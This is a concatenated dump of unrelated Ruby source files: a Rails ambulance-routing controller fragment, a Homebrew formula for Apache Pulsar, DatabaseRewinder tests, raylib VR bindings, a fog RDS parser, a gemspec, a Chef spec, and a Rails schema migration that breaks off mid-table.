geo_hash[k] = {lat: params["lat#{k}".intern], lng: params["lng#{k}".intern], address: params["address#{k}".intern], injure: this_injure}
total_injure += this_injure
geo_code[k] = [params["lat#{k}".intern].to_f, params["lng#{k}".intern].to_f]
end
hos_geo = {}
schedule, d_to_hospital = AiAmbulanceHelper.compare_119_distance(geo_hash, setup_time, speed, total_injure)
schedule.each do |k|
id = k[:id]
next if save_id.include? id
save_id << id
unless color_json.has_key? k[:name]
if color.length > 0
color_json[k[:name]] = color.shift
else
color_json[k[:name]] = "#"+"%06x" % (rand * 0xffffff)
end
end
# color_json[k[:name]] = "#e7e7e7"
tmp = {}
disaster_id = k[:disaster_id]
tmp[:from] = [k[:start_lat], k[:start_lng]]
tmp[:fromText] = k[:name]
# tmp[:toText] = k[:name]
hos_geo[disaster_id] = [k[:hos_lat], k[:hos_lng]]
# tmp[:waypoint] = [geo_code[disaster_id]]
tmp[:to] = geo_code[disaster_id]
tmp[:color] = color_json[k[:name]]
tmp[:icon] = {to:"http://i.imgur.com/B8xApKX.png", from: "http://i.imgur.com/rXh2tJE.png"} #http://i.imgur.com/g8CFAxs.png
result.push(tmp)
end
hos_geo.each do |id, geo|
tmp = {}
tmp[:from] = geo_code[id]
tmp[:to] = geo
tmp[:icon] = {to: "http://i.imgur.com/g8CFAxs.png"}
result.unshift(tmp)
end
render json: result.to_json
end
end
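# Hypothetical request sketch: the parameter names mirror the params read in
# ai_direction above, while the URL path and HTTP verb are assumptions.
#   GET /ai_ambulance/ai_direction?length=2&setup=10&speed=50&
#       lat1=25.03&lng1=121.56&address1=Taipei&injure1=3&
#       lat2=25.05&lng2=121.55&address2=Banqiao&injure2=1
# Each numbered lat/lng/address/injure group describes one disaster site; the
# action responds with a JSON array of colored route segments (dispatch point ->
# site -> hospital) for a map layer to draw.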
| 42.813559 | 148 | 0.524941 |
5d1a270fc306b5d66c61da63727771062439a973
| 3,464 |
class ApachePulsar < Formula
desc "Cloud-native distributed messaging and streaming platform"
homepage "https://pulsar.apache.org/"
url "https://www.apache.org/dyn/mirrors/mirrors.cgi?action=download&filename=pulsar/pulsar-2.8.0/apache-pulsar-2.8.0-src.tar.gz"
mirror "https://archive.apache.org/dist/pulsar/pulsar-2.8.0/apache-pulsar-2.8.0-src.tar.gz"
sha256 "0e161a81c62c7234c1e0c243bb6fe30046ec1cd01472618573ecdc2a73b1163b"
license "Apache-2.0"
head "https://github.com/apache/pulsar.git", branch: "master"
bottle do
sha256 cellar: :any_skip_relocation, big_sur: "56b01c024746edd357eb7d944ee258a734313afd6b0d1e4f79fcf321a38fd740"
sha256 cellar: :any_skip_relocation, catalina: "8733b6cfe86c7161827db14c5434262c9df80fb292a80ddb900a805c4775d33b"
sha256 cellar: :any_skip_relocation, mojave: "15ff056e732b154fb6b05aad64ea2dce42e5a2e4ee79e03aa52233103307074c"
sha256 cellar: :any_skip_relocation, x86_64_linux: "01e0bb86f62ddd706f7e66f8c6f83ccf3970b10a22d873e018022105bfa53a35"
end
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "cppunit" => :build
depends_on "libtool" => :build
depends_on "maven" => :build
depends_on "pkg-config" => :build
depends_on "protobuf" => :build
depends_on arch: :x86_64
depends_on "openjdk@11"
def install
# Missing executable permission reported upstream: https://github.com/apache/pulsar/issues/11833
chmod "+x", "src/rename-netty-native-libs.sh"
with_env("TMPDIR" => buildpath, **Language::Java.java_home_env("11")) do
system "mvn", "-X", "clean", "package", "-DskipTests", "-Pcore-modules"
end
built_version = if build.head?
# This script does not need any particular version of py3 nor any libs, so both
# brew-installed python and system python will work.
Utils.safe_popen_read("python3", "src/get-project-version.py").strip
else
version
end
binpfx = "apache-pulsar-#{built_version}"
system "tar", "-xf", "distribution/server/target/#{binpfx}-bin.tar.gz"
libexec.install "#{binpfx}/bin", "#{binpfx}/lib", "#{binpfx}/instances", "#{binpfx}/conf"
(libexec/"lib/presto/bin/procname/Linux-ppc64le").rmtree
pkgshare.install "#{binpfx}/examples", "#{binpfx}/licenses"
(etc/"pulsar").install_symlink libexec/"conf"
libexec.glob("bin/*") do |path|
if !path.fnmatch?("*common.sh") && !path.directory?
bin_name = path.basename
(bin/bin_name).write_env_script libexec/"bin"/bin_name, Language::Java.java_home_env("11")
end
end
end
def post_install
(var/"log/pulsar").mkpath
end
service do
run [bin/"pulsar", "standalone"]
log_path var/"log/pulsar/output.log"
error_log_path var/"log/pulsar/error.log"
end
test do
fork do
exec bin/"pulsar", "standalone", "--zookeeper-dir", "#{testpath}/zk", " --bookkeeper-dir", "#{testpath}/bk"
end
# The daemon takes some time to start; pulsar-client will retry until it gets a connection, but emit confusing
# errors until that happens, so sleep to reduce log spam.
sleep 15
output = shell_output("#{bin}/pulsar-client produce my-topic --messages 'hello-pulsar'")
assert_match "1 messages successfully produced", output
output = shell_output("#{bin}/pulsar initialize-cluster-metadata -c a -cs localhost -uw localhost -zk localhost")
assert_match "Cluster metadata for 'a' setup correctly", output
end
end
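# Hypothetical post-install sketch (standard `brew services` handling implied by
# the service block above; the produce command mirrors the formula's test):
#   brew services start apache-pulsar                          # runs `pulsar standalone`
#   pulsar-client produce my-topic --messages 'hello-pulsar'   # expects "1 messages successfully produced"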
| 42.243902 | 130 | 0.713048 |
331591d97fe88d04fb7a800f094419e8fe27bfc8
| 215 |
def describe_number(number)
number ||= 42
puts "My number is: #{number}"
sign(number)
end
def sign(number)
case
when number > 0
'Positive'
when number < 0
'Negative'
else
'Zero'
end
end
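# Hypothetical usage sketch (assumption: this file may be run directly as a script).
# `number ||= 42` only substitutes the default when the argument is nil or false,
# so explicit zero and negative values still reach `sign`.
if __FILE__ == $PROGRAM_NAME
  puts describe_number(nil) # prints "My number is: 42" and then "Positive"
  puts describe_number(-3)  # prints "My number is: -3" and then "Negative"
  puts describe_number(0)   # prints "My number is: 0" and then "Zero"
end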
| 12.647059 | 32 | 0.623256 |
619101623f1384e01bbd7d048a53485b62a552f4
| 6,884 |
require 'test_helper'
class DatabaseRewinder::DatabaseRewinderTest < ActiveSupport::TestCase
setup do
DatabaseRewinder.init
end
sub_test_case '.[]' do
teardown do
DatabaseRewinder.database_configuration = nil
end
sub_test_case 'for connecting to an arbitrary database' do
test 'simply giving a connection name only' do
DatabaseRewinder.database_configuration = {'aaa' => {'adapter' => 'sqlite3', 'database' => ':memory:'}}
DatabaseRewinder['aaa']
assert_equal ['aaa'], DatabaseRewinder.instance_variable_get(:'@cleaners').map {|c| c.connection_name}
end
test 'giving a connection name via Hash with :connection key' do
DatabaseRewinder.database_configuration = {'bbb' => {'adapter' => 'sqlite3', 'database' => ':memory:'}}
DatabaseRewinder[connection: 'bbb']
assert_equal ['bbb'], DatabaseRewinder.instance_variable_get(:'@cleaners').map {|c| c.connection_name}
end
test 'the Cleaner compatible syntax' do
DatabaseRewinder.database_configuration = {'ccc' => {'adapter' => 'sqlite3', 'database' => ':memory:'}}
DatabaseRewinder[:aho, connection: 'ccc']
assert_equal ['ccc'], DatabaseRewinder.instance_variable_get(:'@cleaners').map {|c| c.connection_name}
end
end
test 'for connecting to multiple databases' do
DatabaseRewinder[:active_record, connection: 'test']
DatabaseRewinder[:active_record, connection: 'test2']
Foo.create! name: 'foo1'
Quu.create! name: 'quu1'
DatabaseRewinder.clean
# it should clean all configured databases
assert_equal 0, Foo.count
assert_equal 0, Quu.count
end
end
sub_test_case '.record_inserted_table' do
def perform_insert(sql)
DatabaseRewinder.database_configuration = {'foo' => {'adapter' => 'sqlite3', 'database' => 'test_record_inserted_table.sqlite3'}}
@cleaner = DatabaseRewinder.create_cleaner 'foo'
connection = ::ActiveRecord::Base.sqlite3_connection(adapter: "sqlite3", database: File.expand_path('test_record_inserted_table.sqlite3', Rails.root))
DatabaseRewinder.record_inserted_table(connection, sql)
end
teardown do
DatabaseRewinder.database_configuration = nil
end
sub_test_case 'common database' do
test 'include database name' do
perform_insert 'INSERT INTO "database"."foos" ("name") VALUES (?)'
assert_equal ['foos'], @cleaner.inserted_tables
end
test 'only table name' do
perform_insert 'INSERT INTO "foos" ("name") VALUES (?)'
assert_equal ['foos'], @cleaner.inserted_tables
end
test 'without "INTO"' do
perform_insert 'INSERT "foos" ("name") VALUES (?)'
assert_equal ['foos'], @cleaner.inserted_tables
end
end
sub_test_case 'Database accepts more than one dot in an object notation (e.g. SQLServer)' do
test 'full joined' do
perform_insert 'INSERT INTO server.database.schema.foos ("name") VALUES (?)'
assert_equal ['foos'], @cleaner.inserted_tables
end
test 'missing one' do
perform_insert 'INSERT INTO database..foos ("name") VALUES (?)'
assert_equal ['foos'], @cleaner.inserted_tables
end
test 'missing two' do
perform_insert 'INSERT INTO server...foos ("name") VALUES (?)'
assert_equal ['foos'], @cleaner.inserted_tables
end
end
test 'when database accepts INSERT IGNORE INTO statement' do
perform_insert "INSERT IGNORE INTO `foos` (`name`) VALUES ('alice'), ('bob') ON DUPLICATE KEY UPDATE `foos`.`updated_at`=VALUES(`updated_at`)"
assert_equal ['foos'], @cleaner.inserted_tables
end
end
test '.clean' do
Foo.create! name: 'foo1'
Bar.create! name: 'bar1'
DatabaseRewinder.clean
assert_equal 0, Foo.count
assert_equal 0, Bar.count
end
if ActiveRecord::VERSION::STRING >= '4'
test '.clean_all should not touch AR::SchemaMigration' do
begin
ActiveRecord::SchemaMigration.create_table
ActiveRecord::SchemaMigration.create! version: '001'
Foo.create! name: 'foo1'
DatabaseRewinder.clean_all
assert_equal 0, Foo.count
assert_equal 1, ActiveRecord::SchemaMigration.count
ensure
ActiveRecord::SchemaMigration.drop_table
end
end
end
sub_test_case '.clean_with' do
def perform_clean(options)
@cleaner = DatabaseRewinder.cleaners.first
@only = @cleaner.instance_variable_get(:@only)
@except = @cleaner.instance_variable_get(:@except)
Foo.create! name: 'foo1'
Bar.create! name: 'bar1'
DatabaseRewinder.clean_with :truncation, options
end
test 'with only option' do
perform_clean only: ['foos']
assert_equal 0, Foo.count
assert_equal 1, Bar.count
assert_equal @only, @cleaner.instance_variable_get(:@only)
end
test 'with except option' do
perform_clean except: ['bars']
assert_equal 0, Foo.count
assert_equal 1, Bar.count
assert_equal @except, @cleaner.instance_variable_get(:@except)
end
end
sub_test_case '.cleaning' do
test 'without exception' do
DatabaseRewinder.cleaning do
Foo.create! name: 'foo1'
end
assert_equal 0, Foo.count
end
test 'with exception' do
assert_raises do
DatabaseRewinder.cleaning do
Foo.create! name: 'foo1'; fail
end
end
assert_equal 0, Foo.count
end
end
sub_test_case '.strategy=' do
sub_test_case 'call first with options' do
setup do
DatabaseRewinder.strategy = :truncate, { only: ['foos'], except: ['bars'] }
end
test 'should set options' do
assert_equal ['foos'], DatabaseRewinder.instance_variable_get(:@only)
assert_equal ['bars'], DatabaseRewinder.instance_variable_get(:@except)
end
test 'should create cleaner with options' do
cleaner = DatabaseRewinder.instance_variable_get(:@cleaners).first
assert_equal ['foos'], cleaner.instance_variable_get(:@only)
assert_equal ['bars'], cleaner.instance_variable_get(:@except)
end
sub_test_case 'call again with different options' do
setup do
DatabaseRewinder.strategy = :truncate, { only: ['bazs'], except: [] }
end
test 'should overwrite options' do
assert_equal ['bazs'], DatabaseRewinder.instance_variable_get(:@only)
assert_equal [], DatabaseRewinder.instance_variable_get(:@except)
end
test 'should overwrite cleaner with new options' do
cleaner = DatabaseRewinder.instance_variable_get(:@cleaners).first
assert_equal ['bazs'], cleaner.instance_variable_get(:@only)
assert_equal [], cleaner.instance_variable_get(:@except)
end
end
end
end
end
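# Hypothetical spec_helper wiring sketch: it uses only the hooks exercised above
# (clean_all, clean); the RSpec configuration block itself is an assumption.
#   RSpec.configure do |config|
#     config.before(:suite) { DatabaseRewinder.clean_all }
#     config.after(:each)   { DatabaseRewinder.clean }
#   end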
| 34.079208 | 156 | 0.665601 |
79e33a89242b41f11eb861681bfe12abba1f06c9
| 94 |
Rails.application.routes.draw do
namespace 'feedbook' do
resources :employees
end
end
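# Routes produced by the block above under the standard Rails RESTful mapping
# (the controller path is inferred from the namespace, not read from the app):
#   GET    /feedbook/employees           feedbook/employees#index
#   POST   /feedbook/employees           feedbook/employees#create
#   GET    /feedbook/employees/new       feedbook/employees#new
#   GET    /feedbook/employees/:id/edit  feedbook/employees#edit
#   GET    /feedbook/employees/:id       feedbook/employees#show
#   PATCH  /feedbook/employees/:id       feedbook/employees#update
#   DELETE /feedbook/employees/:id       feedbook/employees#destroy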
| 15.666667 | 32 | 0.755319 |
ac2ba365c5ac9be0a527583353cb623c7686d690
| 1,541 |
module Raylib
class VR
extend FFIAttach
#------------------------------------------------------------------------------------
# VR Simulator Functions (Module: rlgl)
# NOTE: These functions are useless when using OpenGL 1.1
#------------------------------------------------------------------------------------
# VR control functions
ray_static :InitVrSimulator, :init, [], :void # Init VR simulator for selected device parameters
ray_static :CloseVrSimulator, :close, [], :void # Close VR simulator for current device
ray_static :UpdateVrTracking, :tracking=, [Camera.ptr], :void # Update VR tracking (position and orientation) and camera
ray_static :SetVrConfiguration, :config=, [VrDeviceInfo.by_value, Shader.by_value], :void # Set stereo rendering configuration parameters
ray_static :IsVrSimulatorReady, :ready?, [], :bool # Detect if VR simulator is ready
ray_static :ToggleVrMode, :toggle, [], :void # Enable/Disable VR experience
ray_static :BeginVrDrawing, :begin_drawing, [], :void # Begin VR simulator stereo rendering
ray_static :EndVrDrawing, :end_drawing, [], :void # End VR simulator stereo rendering
end
end
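# Minimal usage sketch (assumption: the zero-argument class methods bind directly
# to the raylib calls named above and an OpenGL window/context already exists):
#   Raylib::VR.init            # InitVrSimulator
#   Raylib::VR.toggle          # ToggleVrMode - enable the VR experience
#   Raylib::VR.begin_drawing   # BeginVrDrawing
#   # ... draw the scene; raylib renders it for both eyes ...
#   Raylib::VR.end_drawing     # EndVrDrawing
#   Raylib::VR.close           # CloseVrSimulator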
| 73.380952 | 162 | 0.480857 |
1dcbeaaa322469d39581831dfaedd8660bdc5fd0
| 895 |
module Fog
module Parsers
module AWS
module RDS
require 'fog/aws/parsers/rds/security_group_parser'
class AuthorizeDBSecurityGroupIngress < Fog::Parsers::AWS::RDS::SecurityGroupParser
def reset
@response = { 'AuthorizeDBSecurityGroupIngressResult' => {}, 'ResponseMetadata' => {} }
super
end
def start_element(name, attrs = [])
super
end
def end_element(name)
case name
when 'DBSecurityGroup' then
@response['AuthorizeDBSecurityGroupIngressResult']['DBSecurityGroup'] = @security_group
@security_group = fresh_security_group
when 'RequestId'
@response['ResponseMetadata'][name] = @value
else
super
end
end
end
end
end
end
end
| 22.948718 | 101 | 0.556425 |
085ce3e7b707cd41427e9d07f73de8f4a3f7402e
| 1,950 |
# -*- encoding: utf-8 -*-
# stub: jekyll-gist 1.4.1 ruby lib
Gem::Specification.new do |s|
s.name = "jekyll-gist".freeze
s.version = "1.4.1"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["Parker Moore".freeze]
s.date = "2017-06-21"
s.email = ["[email protected]".freeze]
s.homepage = "https://github.com/jekyll/jekyll-gist".freeze
s.licenses = ["MIT".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 1.9.3".freeze)
s.rubygems_version = "2.7.6".freeze
s.summary = "Liquid tag for displaying GitHub Gists in Jekyll sites.".freeze
s.installed_by_version = "2.7.6" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_runtime_dependency(%q<octokit>.freeze, ["~> 4.2"])
s.add_development_dependency(%q<bundler>.freeze, ["~> 1.6"])
s.add_development_dependency(%q<rake>.freeze, [">= 0"])
s.add_development_dependency(%q<rspec>.freeze, [">= 0"])
s.add_development_dependency(%q<webmock>.freeze, [">= 0"])
s.add_development_dependency(%q<jekyll>.freeze, [">= 2.0"])
else
s.add_dependency(%q<octokit>.freeze, ["~> 4.2"])
s.add_dependency(%q<bundler>.freeze, ["~> 1.6"])
s.add_dependency(%q<rake>.freeze, [">= 0"])
s.add_dependency(%q<rspec>.freeze, [">= 0"])
s.add_dependency(%q<webmock>.freeze, [">= 0"])
s.add_dependency(%q<jekyll>.freeze, [">= 2.0"])
end
else
s.add_dependency(%q<octokit>.freeze, ["~> 4.2"])
s.add_dependency(%q<bundler>.freeze, ["~> 1.6"])
s.add_dependency(%q<rake>.freeze, [">= 0"])
s.add_dependency(%q<rspec>.freeze, [">= 0"])
s.add_dependency(%q<webmock>.freeze, [">= 0"])
s.add_dependency(%q<jekyll>.freeze, [">= 2.0"])
end
end
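# Hypothetical consumer sketch (the Gemfile line and Liquid tag follow jekyll-gist's
# documented usage; the gist reference is a placeholder):
#   # Gemfile
#   gem "jekyll-gist", "~> 1.4"
#   # in a post or page
#   {% gist parkr/c08ee0f2726fd0e3909d %}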
| 40.625 | 112 | 0.638462 |
3362b68c629602b389ff6e79bc8213d903601b09
| 1,204 |
#
# Author:: Adam Jacob (<[email protected]>)
# Copyright:: Copyright (c) 2008 Opscode, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'spec_helper'
describe Chef::Resource::Python do
before(:each) do
@resource = Chef::Resource::Python.new("fakey_fakerton")
end
it "should create a new Chef::Resource::Python" do
@resource.should be_a_kind_of(Chef::Resource)
@resource.should be_a_kind_of(Chef::Resource::Python)
end
it "should have a resource name of :python" do
@resource.resource_name.should eql(:python)
end
it "should have an interpreter of python" do
@resource.interpreter.should eql("python")
end
end
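# Hypothetical recipe usage sketch for the resource specced above (a script-style
# resource with an inline code attribute; the recipe context is assumed):
#   python "print_hello" do
#     code "print 'hello from chef'"
#   end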
| 29.365854 | 74 | 0.733389 |
9171f6ca343b16fd520c74b4f1e10972f28720cd
| 132 |
require 'test_helper'
class BlogBoi::Test < ActiveSupport::TestCase
test "truth" do
assert_kind_of Module, BlogBoi
end
end
| 16.5 | 45 | 0.75 |
4a79ba7eb9e026165d9b026561b28626755cdc20
| 19,932 |
class CreateLuvfoo < ActiveRecord::Migration
def self.up
create_table "bag_properties", :force => true do |t|
t.integer "bag_id", :default => 1
t.string "name"
t.string "label"
t.integer "data_type", :default => 1
t.string "display_type", :default => "text"
t.boolean "required", :default => false
t.string "default_value"
t.integer "default_visibility", :default => 4
t.boolean "can_change_visibility", :default => true
t.integer "sort", :default => 9999
t.integer "width", :default => -1
t.integer "height", :default => -1
t.integer "registration_page"
t.string "sf_field"
t.boolean "is_link", :default => false
t.string "prefix"
t.integer "maxlength", :default => 5000
end
create_table "bag_property_enums", :force => true do |t|
t.integer "bag_property_id"
t.string "name"
t.string "value"
t.integer "sort"
end
add_index "bag_property_enums", ["bag_property_id"], :name => "index_bag_property_enums_on_bag_property_id"
create_table "bag_property_values", :force => true do |t|
t.integer "data_type", :default => 1
t.integer "user_id"
t.integer "bag_property_id"
t.string "svalue"
t.text "tvalue", :limit => 16777215
t.integer "ivalue"
t.integer "bag_property_enum_id"
t.datetime "tsvalue"
t.integer "visibility"
end
add_index "bag_property_values", ["user_id", "bag_property_id"], :name => "index_bag_property_values_on_user_id_and_bag_property_id"
create_table "blogs", :force => true do |t|
t.string "title"
t.text "body"
t.integer "user_id"
t.datetime "created_at"
t.datetime "updated_at"
end
add_index "blogs", ["user_id"], :name => "index_blogs_on_user_id"
create_table "comments", :force => true do |t|
t.text "comment"
t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false
t.integer "user_id"
t.string "commentable_type", :default => "", :null => false
t.integer "commentable_id", :null => false
t.integer "is_denied", :default => 0, :null => false
t.boolean "is_reviewed", :default => false
end
add_index "comments", ["user_id"], :name => "index_comments_on_user_id"
add_index "comments", ["commentable_id", "commentable_type"], :name => "index_comments_on_commentable_id_and_commentable_type"
create_table "content_page_versions", :force => true do |t|
t.integer "content_page_id"
t.integer "version"
t.integer "creator_id"
t.string "title"
t.string "url_key"
t.text "body"
t.string "locale"
t.datetime "updated_at"
t.text "body_raw"
t.integer "contentable_id"
t.string "contentable_type"
t.integer "parent_id", :default => 0
end
create_table "content_pages", :force => true do |t|
t.integer "creator_id"
t.string "title"
t.string "url_key"
t.text "body"
t.string "locale"
t.datetime "created_at"
t.datetime "updated_at"
t.text "body_raw"
t.integer "contentable_id"
t.string "contentable_type"
t.integer "parent_id", :default => 0, :null => false
t.integer "version"
end
add_index "content_pages", ["parent_id"], :name => "index_content_pages_on_parent_id"
create_table "countries", :force => true do |t|
t.string "name", :limit => 128, :default => "", :null => false
t.string "abbreviation", :limit => 3, :default => "", :null => false
end
create_table "entries", :force => true do |t|
t.string "permalink", :limit => 2083
t.string "title"
t.text "body"
t.datetime "published_at"
t.datetime "created_at"
t.datetime "updated_at"
t.integer "user_id"
t.boolean "google_doc", :default => false
t.boolean "displayable", :default => false
end
create_table "feed_items", :force => true do |t|
t.boolean "include_comments", :default => false, :null => false
t.boolean "is_public", :default => false, :null => false
t.integer "item_id"
t.string "item_type"
t.integer "creator_id"
t.datetime "created_at"
t.datetime "updated_at"
end
add_index "feed_items", ["item_id", "item_type"], :name => "index_feed_items_on_item_id_and_item_type"
create_table "feeds", :force => true do |t|
t.integer "ownable_id"
t.integer "feed_item_id"
t.string "ownable_type"
end
add_index "feeds", ["ownable_id", "feed_item_id"], :name => "index_feeds_on_user_id_and_feed_item_id"
create_table "forums", :force => true do |t|
t.string "name"
t.text "description"
t.integer "position"
t.datetime "created_at"
t.datetime "updated_at"
t.string "forumable_type"
t.integer "forumable_id"
t.string "url_key"
end
add_index "forums", ["url_key"], :name => "index_forums_on_url_key"
create_table "friends", :force => true do |t|
t.integer "inviter_id"
t.integer "invited_id"
t.integer "status", :default => 0
t.datetime "created_at"
t.datetime "updated_at"
end
add_index "friends", ["inviter_id", "invited_id"], :name => "index_friends_on_inviter_id_and_invited_id", :unique => true
add_index "friends", ["invited_id", "inviter_id"], :name => "index_friends_on_invited_id_and_inviter_id", :unique => true
create_table "grade_level_experiences", :force => true do |t|
t.string "name"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "grade_level_experiences_users", :id => false, :force => true do |t|
t.integer "user_id"
t.integer "grade_level_experience_id"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "groups", :force => true do |t|
t.integer "creator_id"
t.string "name"
t.text "description"
t.string "icon"
t.string "state"
t.string "url_key"
t.datetime "created_at"
t.datetime "updated_at"
t.string "default_role", :default => "member"
t.integer "visibility", :default => 2
t.boolean "requires_approval_to_join", :default => false
end
add_index "groups", ["url_key"], :name => "index_groups_on_url_key"
add_index "groups", ["creator_id"], :name => "index_groups_on_creator_id"
create_table "interests", :force => true do |t|
t.string "name"
end
create_table "interests_users", :id => false, :force => true do |t|
t.integer "user_id"
t.integer "interest_id"
t.datetime "created_at"
t.datetime "updated_at"
end
add_index "interests_users", ["user_id", "interest_id"], :name => "index_interests_users_on_user_id_and_interest_id"
add_index "interests_users", ["user_id"], :name => "index_interests_users_on_user_id"
create_table "languages", :force => true do |t|
t.string "name"
t.string "english_name"
t.integer "is_default", :default => 0
end
create_table "languages_users", :id => false, :force => true do |t|
t.integer "user_id"
t.integer "language_id"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "logos", :force => true do |t|
t.integer "site_id"
t.integer "parent_id"
t.integer "user_id"
t.integer "size"
t.integer "width"
t.integer "height"
t.string "content_type"
t.string "filename"
t.string "thumbnail"
t.datetime "created_at"
t.datetime "updated_at"
end
add_index "logos", ["site_id"], :name => "index_logos_on_site_id"
add_index "logos", ["parent_id"], :name => "index_logos_on_parent_id"
add_index "logos", ["user_id"], :name => "index_logos_on_user_id"
add_index "logos", ["content_type"], :name => "index_logos_on_content_type"
create_table "membership_requests", :force => true do |t|
t.integer "group_id"
t.integer "user_id"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "memberships", :force => true do |t|
t.integer "group_id"
t.integer "user_id"
t.boolean "banned", :default => false
t.string "role", :default => "--- :member\n"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "messages", :force => true do |t|
t.string "subject"
t.text "body"
t.datetime "created_at"
t.datetime "updated_at"
t.integer "sender_id"
t.integer "receiver_id"
t.boolean "read", :default => false, :null => false
end
add_index "messages", ["sender_id"], :name => "index_messages_on_sender_id"
add_index "messages", ["receiver_id"], :name => "index_messages_on_receiver_id"
create_table "news_items", :force => true do |t|
t.string "title"
t.text "body"
t.integer "newsable_id"
t.string "newsable_type"
t.datetime "created_at"
t.datetime "updated_at"
t.string "url_key"
t.string "icon"
t.integer "creator_id"
end
add_index "news_items", ["url_key"], :name => "index_news_items_on_url_key"
create_table "open_id_authentication_associations", :force => true do |t|
t.integer "issued"
t.integer "lifetime"
t.string "handle"
t.string "assoc_type"
t.binary "server_url"
t.binary "secret"
end
create_table "open_id_authentication_nonces", :force => true do |t|
t.integer "timestamp", :null => false
t.string "server_url"
t.string "salt", :null => false
end
create_table "permissions", :force => true do |t|
t.integer "role_id", :null => false
t.integer "user_id", :null => false
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "photos", :force => true do |t|
t.string "caption", :limit => 1000
t.datetime "created_at"
t.datetime "updated_at"
t.integer "photoable_id"
t.string "image"
t.string "photoable_type"
end
add_index "photos", ["photoable_id"], :name => "index_photos_on_user_id"
create_table "plone_group_roles", :force => true do |t|
t.string "login"
t.string "rolename"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "plone_open_roles", :force => true do |t|
t.string "login"
t.string "rolename"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "professional_roles", :force => true do |t|
t.string "name"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "roles", :force => true do |t|
t.string "rolename"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "sessions", :force => true do |t|
t.string "session_id"
t.text "data"
t.datetime "updated_at"
end
add_index "sessions", ["session_id"], :name => "index_sessions_on_session_id"
add_index "sessions", ["updated_at"], :name => "index_sessions_on_updated_at"
create_table "shared_entries", :force => true do |t|
t.integer "shared_by_id"
t.integer "entry_id"
t.string "destination_type", :default => "", :null => false
t.integer "destination_id", :null => false
t.datetime "created_at"
t.boolean "can_edit", :default => false
t.boolean "public", :default => false
end
create_table "shared_pages", :force => true do |t|
t.integer "content_page_id"
t.string "share_type", :default => "", :null => false
t.integer "share_id", :null => false
t.integer "status", :default => 0
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "shared_uploads", :force => true do |t|
t.integer "shared_uploadable_id"
t.string "shared_uploadable_type"
t.integer "upload_id"
t.integer "shared_by_id"
t.datetime "created_at"
t.datetime "updated_at"
end
add_index "shared_uploads", ["shared_uploadable_id"], :name => "index_shared_uploads_on_uploadable_id"
add_index "shared_uploads", ["upload_id"], :name => "index_shared_uploads_on_upload_id"
add_index "shared_uploads", ["shared_by_id"], :name => "index_shared_uploads_on_shared_by_id"
create_table "sites", :force => true do |t|
t.string "name"
t.datetime "created_at"
t.datetime "updated_at"
t.string "title", :default => "", :null => false
t.string "subtitle", :default => "", :null => false
t.string "slogan", :default => "", :null => false
t.string "background_color", :default => "", :null => false
t.string "font_color", :default => "", :null => false
t.string "font_style", :default => "", :null => false
t.string "font_size", :default => "", :null => false
t.string "content_background_color", :default => "", :null => false
t.string "a_font_style", :default => "", :null => false
t.string "a_font_color", :default => "", :null => false
t.string "top_background_color", :default => "", :null => false
t.string "top_color", :default => "", :null => false
end
create_table "states", :force => true do |t|
t.string "name", :limit => 128, :default => "", :null => false
t.string "abbreviation", :limit => 3, :default => "", :null => false
t.integer "country_id", :limit => 8, :null => false
end
add_index "states", ["country_id"], :name => "country_id"
create_table "taggings", :force => true do |t|
t.integer "tag_id"
t.integer "taggable_id"
t.integer "tagger_id"
t.string "tagger_type"
t.string "taggable_type"
t.string "context"
t.datetime "created_at"
end
add_index "taggings", ["tag_id"], :name => "index_taggings_on_tag_id"
add_index "taggings", ["taggable_id", "taggable_type", "context"], :name => "index_taggings_on_taggable_id_and_taggable_type_and_context"
create_table "tags", :force => true do |t|
t.string "name"
end
create_table "uploads", :force => true do |t|
t.integer "parent_id"
t.integer "user_id"
t.string "content_type"
t.string "name"
t.string "caption", :limit => 1000
t.text "description"
t.string "filename"
t.string "thumbnail"
t.integer "size"
t.integer "width"
t.integer "height"
t.datetime "created_at"
t.datetime "updated_at"
t.boolean "is_public", :default => true
t.integer "uploadable_id"
t.string "uploadable_type"
end
add_index "uploads", ["parent_id"], :name => "index_uploads_on_parent_id"
add_index "uploads", ["user_id"], :name => "index_uploads_on_user_id"
add_index "uploads", ["content_type"], :name => "index_uploads_on_content_type"
create_table "users", :force => true do |t|
t.string "login"
t.string "email"
t.string "crypted_password", :limit => 40
t.string "salt", :limit => 40
t.string "remember_token"
t.datetime "remember_token_expires_at"
t.string "activation_code", :limit => 40
t.datetime "activated_at"
t.string "password_reset_code", :limit => 40
t.boolean "enabled", :default => true
t.boolean "terms_of_service", :default => false, :null => false
t.boolean "can_send_messages", :default => true
t.string "time_zone", :default => "UTC"
t.string "first_name"
t.string "last_name"
t.string "website"
t.string "blog"
t.string "flickr"
t.text "about_me"
t.string "aim_name"
t.string "gtalk_name"
t.string "ichat_name"
t.string "icon"
t.string "location"
t.datetime "created_at"
t.datetime "updated_at"
t.boolean "is_active", :default => false
t.string "youtube_username"
t.string "flickr_username"
t.string "identity_url"
t.string "city"
t.integer "state_id"
t.string "zip"
t.integer "country_id"
t.string "phone"
t.string "phone2"
t.string "msn"
t.string "skype"
t.string "yahoo"
t.string "organization"
